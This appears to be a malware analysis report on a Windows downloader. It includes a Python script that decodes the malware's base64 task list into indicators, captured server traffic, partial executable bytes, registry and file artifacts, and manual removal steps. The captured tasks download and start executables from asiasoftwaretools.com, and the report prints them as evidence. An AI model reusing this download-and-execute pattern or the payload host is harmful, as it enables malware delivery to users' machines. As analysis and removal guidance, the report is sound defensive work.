sdWU9Imh0dHA6Ly9hc2lhc29mdHdhcmV0b29scy5jb20vZG93bmxvYWQvNC9uZmFyZ2EzU
29ybU9ta29tLmV4ZSIgdmVyc2lvbj0iIiBzb2Z0d2FyZT0iIiBuZXQ9InllcyIvPiA8cHJ
vY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmFsdWU9Im5vd
HdhaXQiIHBhcmFtcz0iIi8+IDxtb2QgdHlwZT0iYWRkIiBuYW1lPSJuZmFyZ2EzU29ybU9
ta29tIiB2YWx1ZT0iTW5heWtpbm5ubm5ubiIvPiA8L3BlcmZvcm0+IDxjb25kaXRpb25zP
iA8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJuZmFyZ2EzU29ybU9ta29tIiB2YWx1ZT0iTW5
heWtpbm5ubm5ubkJhcmNoYSIgbWF0Y2g9ImZhbHNlIi8+IDwvY29uZGl0aW9ucz4gP

<<< skipped >>>
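The response body above is the bundler's task list: base64-encoded XML that tells the client what to download, what to start and which marker values to record and check. Two things get in the way of reading it from a dump like this one: the '+' characters of the base64 alphabet can come through as spaces when the capture is URL-decoded, and the dump is cut off well before the announced Content-Length of 1644 bytes, leaving a partial trailing quantum. The following script, added here and not part of the Lavasoft report, repairs both problems and pulls the download URLs, start commands, marker values and contacted hosts out of the task XML. The blob is embedded as it appears in the capture above; regular expressions are used instead of an XML parser precisely because the document is truncated.

```python
import base64
import re

# The body returned by remotes_xml_sections.php, copied from the traffic
# capture above. The server announced Content-Length: 1644 but the dump
# stops after 1113 characters, so the last base64 quantum is incomplete.
TASK_BLOB = (
    "PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s+DQoNCjxwZXJmb3JtPg0KDQo8ZG9"
    "3bmxvYWQgbmFtZT0iYXNhc2EiIHZhbHVlPSJodHRwOi8vYXNpYXNvZnR3YXJldG9vbHMuY"
    "29tL2Rvd25sb2FkLzQvcmVwbGFjZVVuaW5zdGFsbGVyLmV4ZSAiIHZlcnNpb249IiIgIHN"
    "vZnR3YXJlPSIiIG5ldD0ieWVzIi8+DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iY"
    "XNhc2EiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IndlIi8+DQo8bW9kIHR5cGU9ImFkZCI"
    "gbmFtZT0iYXNhc2EiIHZhbHVlPSJlZWV6NTg1OCIvPg0KDQo8L3BlcmZvcm0+DQoNCjxjb"
    "25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJhc2FzYSIgdmFsdWU9ImV"
    "lZXo1ODU4IiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KDQo8L3Rhc2s+P"
    "HRhc2s+IDxwZXJmb3JtPiA8ZG93bmxvYWQgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmF"
    "sdWU9Imh0dHA6Ly9hc2lhc29mdHdhcmV0b29scy5jb20vZG93bmxvYWQvNC9uZmFyZ2EzU"
    "29ybU9ta29tLmV4ZSIgdmVyc2lvbj0iIiBzb2Z0d2FyZT0iIiBuZXQ9InllcyIvPiA8cHJ"
    "vY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmFsdWU9Im5vd"
    "HdhaXQiIHBhcmFtcz0iIi8+IDxtb2QgdHlwZT0iYWRkIiBuYW1lPSJuZmFyZ2EzU29ybU9"
    "ta29tIiB2YWx1ZT0iTW5heWtpbm5ubm5ubiIvPiA8L3BlcmZvcm0+IDxjb25kaXRpb25zP"
    "iA8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJuZmFyZ2EzU29ybU9ta29tIiB2YWx1ZT0iTW5"
    "heWtpbm5ubm5ubkJhcmNoYSIgbWF0Y2g9ImZhbHNlIi8+IDwvY29uZGl0aW9ucz4gP"
)

TAG_RE = re.compile(r"<(download|process|mod)\b([^>]*)>")
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def repair_base64(blob):
    """Decode base64 from a traffic dump that may have been URL-decoded
    ('+' turned into ' ') and truncated (a dangling partial quantum)."""
    s = blob.replace("\r", "").replace("\n", "").replace(" ", "+")
    rem = len(s) % 4
    if rem == 1:          # a lone trailing character cannot encode a byte
        s = s[:-1]
    elif rem:             # 2 or 3 chars encode 1 or 2 bytes; pad them
        s += "=" * (4 - rem)
    return base64.b64decode(s, validate=True)


def parse_tasks(xml_text):
    """Collect the actionable elements with their attributes. Regex rather
    than an XML parser because the capture ends mid-document."""
    actions = []
    for m in TAG_RE.finditer(xml_text):
        attrs = dict(ATTR_RE.findall(m.group(2)))
        attrs["element"] = m.group(1)
        actions.append(attrs)
    return actions


def extract_iocs(blob):
    xml_text = repair_base64(blob).decode("utf-8", "replace")
    actions = parse_tasks(xml_text)
    refresh = re.search(r'<updates\s+refresh="(\d+)"', xml_text)
    downloads = [(a["name"], a["value"].strip())  # one URL carries a trailing space
                 for a in actions if a["element"] == "download"]
    return {
        "refresh": int(refresh.group(1)) if refresh else None,
        "downloads": downloads,
        "starts": [a["name"] for a in actions
                   if a["element"] == "process" and a.get("type") == "start"],
        "markers": [(a["type"], a["name"], a["value"]) for a in actions
                    if a["element"] == "mod"],
        "hosts": sorted({re.sub(r"^https?://([^/]+).*$", r"\1", u) for _, u in downloads}),
        "actions": actions,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(TASK_BLOB).items():
        if key != "actions":
            print(f"{key}: {value}")
```

The decoded tasks match the dynamic analysis above: both downloads come from asiasoftwaretools.com and both names (asasa, nfarga3SormOmkom) are the executables the sample dropped into %Temp%\87HQR3ZCB6 and started.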

GET /get/4/diskpower-uninstaller.exe HTTP/1.1
Host: asiasoftwaretools.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:31 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="diskpower-uninstaller.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
b7800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......X.........."...0..&...P......RD... ...`....@.. .................
...................@..................................D..O....`..0M...
........................B.............................................
.. ............... ..H............text...X$... ...&..................
..`.rsrc...0M...`...N...(..............@..@.reloc...............v.....
.........@..B................4D......H.......8#...............9.......
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.(
....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s..
..(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"...
.....~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r..
.ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........()..
...(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2...
....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8...
o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%.
.....o?................(....()...*.0..........r...p(.......(......&..
*.................0..9......... ..X...{......>...(@....{.....>.
..(@...}......{....2.*...BSJB............v2.0.50727......l.......#~...
.......#Strings....0.......#US.$.......#GUID...4...|...#Blob..........
.WU.........3........>...................@.....................

<<< skipped >>>

The Application connects to the servers at the following location(s):


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    asasa.exe:888
    nfarga3SormOmkom.exe:600
    WeLoveYou.exe:3640
    PRPCR3DZBB.exe:2192

  2. Delete the original Application file.
  3. Delete or disinfect the following files created/modified by the Application:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe (35240 bytes)
    C:\Windows\System32\drivers\etc\hosts (212 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe (208 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (63 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe (116842 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe.config.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe.config.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe.config.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe (11109 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_UC5GW" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
